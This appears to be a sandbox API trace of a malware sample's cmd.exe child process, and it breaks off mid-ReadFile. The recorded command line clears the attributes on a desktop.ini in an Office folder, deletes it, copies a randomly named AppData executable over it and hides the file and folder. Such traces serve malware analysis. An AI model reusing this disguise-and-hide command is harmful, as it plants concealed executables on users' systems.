[0152.082] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.082] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0152.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.082] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0152.082] _get_osfhandle (_FileHandle=0) returned 0x3 [0152.082] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0152.083] GetEnvironmentStringsW () returned 0x300560* [0152.083] FreeEnvironmentStringsW (penv=0x300560) returned 1 [0152.083] GetEnvironmentStringsW () returned 0x300560* [0152.083] FreeEnvironmentStringsW (penv=0x300560) returned 1 [0152.083] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaac | out: phkResult=0x1aeaac*=0x40) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x10, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x0, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.083] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.083] RegCloseKey (hKey=0x40) returned 0x0 [0152.084] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aeaac | out: phkResult=0x1aeaac*=0x40) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x40, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x1, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x0, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x4, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x4) returned 0x0 [0152.084] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aeab4, lpData=0x1aeab8, lpcbData=0x1aeab0*=0x1000 | out: lpType=0x1aeab4*=0x0, lpData=0x1aeab8*=0x9, lpcbData=0x1aeab0*=0x1000) returned 0x2 [0152.084] RegCloseKey (hKey=0x40) returned 0x0 [0152.084] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637a [0152.084] srand (_Seed=0x5b88637a) [0152.084] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" [0152.084] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\"" [0152.084] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.084] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x301cc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0152.085] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.085] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0152.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0152.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0152.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0152.085] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0152.085] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0152.085] GetEnvironmentStringsW () returned 0x3026b0* [0152.085] FreeEnvironmentStringsW (penv=0x3026b0) returned 1 [0152.085] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.085] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0152.085] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0152.085] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0152.085] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0152.085] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0152.086] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0152.086] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0152.086] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0152.086] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0152.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.086] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af878, lpFilePart=0x1af874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af874*="Desktop") returned 0x18 [0152.086] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.086] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.086] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.086] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af5f4 | out: lpFindFileData=0x1af5f4) returned 0x300d40 [0152.087] FindClose (in: hFindFile=0x300d40 | out: hFindFile=0x300d40) returned 1 [0152.087] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0152.087] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0152.087] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0152.087] GetEnvironmentStringsW () returned 0x300560* [0152.087] FreeEnvironmentStringsW (penv=0x300560) returned 1 [0152.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0152.088] GetConsoleOutputCP () returned 0x1b5 [0152.088] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0152.088] GetUserDefaultLCID () returned 0x409 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="0") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="0") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af9b8, cchData=128 | out: lpLCData="1") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0152.088] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0152.089] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0152.089] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0152.090] GetConsoleTitleW (in: lpConsoleTitle=0x2f0b48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.090] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0152.090] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0152.091] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0152.091] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0152.091] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0152.091] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0152.091] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0152.091] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0152.091] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0152.094] _wcsicmp (_String1="del", _String2=")") returned 59 [0152.094] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0152.094] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0152.094] _wcsicmp (_String1="IF", _String2="del") returned 5 [0152.094] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0152.094] _wcsicmp (_String1="REM", _String2="del") returned 14 [0152.094] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0152.097] _wcsicmp (_String1="type", _String2=")") returned 75 [0152.097] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0152.097] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0152.097] _wcsicmp (_String1="IF", _String2="type") returned -11 [0152.097] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0152.097] _wcsicmp (_String1="REM", _String2="type") returned -2 [0152.097] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0152.198] SetErrorMode (uMode=0x0) returned 0x0 [0152.198] SetErrorMode (uMode=0x1) returned 0x0 [0152.198] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x300618, lpFilePart=0x1af16c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af16c*="Desktop") returned 0x18 [0152.198] SetErrorMode (uMode=0x0) returned 0x1 [0152.198] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0152.198] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0152.204] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff [0152.205] GetLastError () returned 0x2 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff [0152.205] GetLastError () returned 0x2 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0x302660 [0152.205] FindClose (in: hFindFile=0x302660 | out: hFindFile=0x302660) returned 1 [0152.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0xffffffff [0152.206] GetLastError () returned 0x2 [0152.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aeee8) returned 0x302660 [0152.206] FindClose (in: hFindFile=0x302660 | out: hFindFile=0x302660) returned 1 [0152.206] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0152.206] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0152.206] GetConsoleTitleW (in: lpConsoleTitle=0x1af3e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.206] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af268, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af330 | out: lpAttributeList=0x1af268, lpSize=0x1af330) returned 1 [0152.206] UpdateProcThreadAttribute (in: lpAttributeList=0x1af268, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af328, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af268, lpPreviousValue=0x0) returned 1 [0152.206] GetStartupInfoW (in: lpStartupInfo=0x1af224 | out: lpStartupInfo=0x1af224*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0152.206] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0152.207] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af2c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af310 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini\" ", lpProcessInformation=0x1af310*(hProcess=0x50, hThread=0x4c, dwProcessId=0xcb0, dwThreadId=0xca0)) returned 1 [0152.256] CloseHandle (hObject=0x4c) returned 1 [0152.256] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0152.256] GetEnvironmentStringsW () returned 0x300b50* [0152.257] FreeEnvironmentStringsW (penv=0x300b50) returned 1 [0152.257] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0152.488] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af204 | out: lpExitCode=0x1af204*=0x0) returned 1 [0152.488] CloseHandle (hObject=0x50) returned 1 [0152.488] _vsnwprintf (in: _Buffer=0x1af34c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af210 | out: _Buffer="00000000") returned 8 [0152.488] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0152.488] GetEnvironmentStringsW () returned 0x302680* [0152.488] FreeEnvironmentStringsW (penv=0x302680) returned 1 [0152.488] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0152.488] GetEnvironmentStringsW () returned 0x302680* [0152.489] FreeEnvironmentStringsW (penv=0x302680) returned 1 [0152.489] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af268 | out: lpAttributeList=0x1af268) [0152.489] GetConsoleTitleW (in: lpConsoleTitle=0x1af5e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.489] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ae660, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ae664, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ae660*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0152.489] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0152.489] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0152.489] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0152.489] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini")) returned 0xffffffff [0152.489] GetLastError () returned 0x2 [0152.489] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2010 [0152.490] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0152.490] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0152.490] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini")) returned 0xffffffff [0152.490] GetLastError () returned 0x2 [0152.490] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x30377c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30377c) returned 0xffffffff [0152.490] GetLastError () returned 0x2 [0152.490] _get_osfhandle (_FileHandle=2) returned 0xb [0152.490] GetFileType (hFile=0xb) returned 0x2 [0152.490] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0152.490] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af060 | out: lpMode=0x1af060) returned 1 [0152.490] _get_osfhandle (_FileHandle=2) returned 0xb [0152.490] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1af094 | out: lpConsoleScreenBufferInfo=0x1af094) returned 1 [0152.491] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0152.491] GetFileType (hFile=0x7) returned 0x2 [0152.491] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0152.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af784 | out: lpMode=0x1af784) returned 1 [0152.492] _dup (_FileHandle=1) returned 3 [0152.492] _close (_FileHandle=1) returned 0 [0152.492] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini", _String2="con") returned -53 [0152.492] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\desktop.ini" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af754, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0152.492] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0152.492] GetConsoleTitleW (in: lpConsoleTitle=0x1af584, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0152.493] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1af0e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0e8) returned 0x302810 [0152.493] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0152.493] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0152.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0152.493] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1adff4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0152.493] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] GetFileType (hFile=0x58) returned 0x1 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x1ae04c | out: lpFileSizeHigh=0x1ae04c*=0x0) returned 0x7d600 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.493] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.493] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 